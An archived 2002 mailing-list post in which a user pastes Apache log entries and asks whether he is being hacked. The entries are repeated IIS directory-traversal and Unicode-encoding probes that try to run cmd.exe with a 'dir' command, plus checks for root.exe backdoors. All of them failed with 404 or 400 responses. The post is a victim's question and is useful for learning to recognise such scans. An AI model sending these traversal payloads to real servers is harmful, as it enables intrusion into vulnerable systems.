[CLUE-Tech] Is someone trying to hack me?
Jason S. Friedman
jason at powerpull.net
Wed Nov 13 20:26:55 MST 2002
What are these in my apache server logs?
63.231.245.155 - - [13/Nov/2002:22:10:21 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
63.231.245.155 - - [13/Nov/2002:22:10:22 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
63.231.245.155 - - [13/Nov/2002:22:38:50 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
63.231.245.155 - - [13/Nov/2002:22:38:50 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285
63.231.245.155 - - [13/Nov/2002:22:38:51 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
63.231.245.155 - - [13/Nov/2002:22:38:51 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
63.231.245.155 - - [13/Nov/2002:22:38:51 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
63.231.245.155 - - [13/Nov/2002:22:38:51 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
63.231.245.155 - - [13/Nov/2002:22:38:52 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
63.231.245.155 - - [13/Nov/2002:22:38:52 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
63.231.245.155 - - [13/Nov/2002:22:38:52 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
63.231.245.155 - - [13/Nov/2002:22:38:52 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
63.231.245.155 - - [13/Nov/2002:22:38:52 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
63.231.245.155 - - [13/Nov/2002:22:38:53 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
63.231.245.155 - - [13/Nov/2002:22:38:53 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
63.231.245.155 - - [13/Nov/2002:22:38:53 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
63.231.245.155 - - [13/Nov/2002:22:38:53 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
63.231.245.155 - - [13/Nov/2002:22:38:53 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
63.231.245.155 - - [13/Nov/2002:23:16:55 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
63.231.245.155 - - [13/Nov/2002:23:16:55 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285
63.231.245.155 - - [13/Nov/2002:23:16:55 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
63.231.245.155 - - [13/Nov/2002:23:16:56 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
63.231.245.155 - - [13/Nov/2002:23:16:56 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
63.231.245.155 - - [13/Nov/2002:23:16:56 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
63.231.245.155 - - [13/Nov/2002:23:16:56 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
63.231.245.155 - - [13/Nov/2002:23:16:57 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
63.231.245.155 - - [13/Nov/2002:23:16:57 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
63.231.245.155 - - [13/Nov/2002:23:16:57 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
63.231.245.155 - - [13/Nov/2002:23:16:57 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
63.231.245.155 - - [13/Nov/2002:23:16:57 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
63.231.245.155 - - [13/Nov/2002:23:16:58 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
63.231.245.155 - - [13/Nov/2002:23:16:58 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
63.231.245.155 - - [13/Nov/2002:23:16:58 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
63.231.245.155 - - [13/Nov/2002:23:16:58 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
63.231.245.155 - - [14/Nov/2002:01:53:52 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
63.231.245.155 - - [14/Nov/2002:01:53:52 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285
63.231.245.155 - - [14/Nov/2002:01:53:52 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
63.231.245.155 - - [14/Nov/2002:01:53:53 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
63.231.245.155 - - [14/Nov/2002:01:53:53 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
63.231.245.155 - - [14/Nov/2002:01:53:53 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
63.231.245.155 - - [14/Nov/2002:01:53:53 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
63.231.245.155 - - [14/Nov/2002:01:53:53 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
63.231.245.155 - - [14/Nov/2002:01:53:54 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
63.231.245.155 - - [14/Nov/2002:01:53:54 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
63.231.245.155 - - [14/Nov/2002:01:53:54 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
63.231.245.155 - - [14/Nov/2002:01:53:54 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
63.231.245.155 - - [14/Nov/2002:01:53:54 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
63.231.245.155 - - [14/Nov/2002:01:53:55 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
63.231.245.155 - - [14/Nov/2002:01:53:55 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
63.231.245.155 - - [14/Nov/2002:01:53:55 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
More information about the clue-tech
mailing list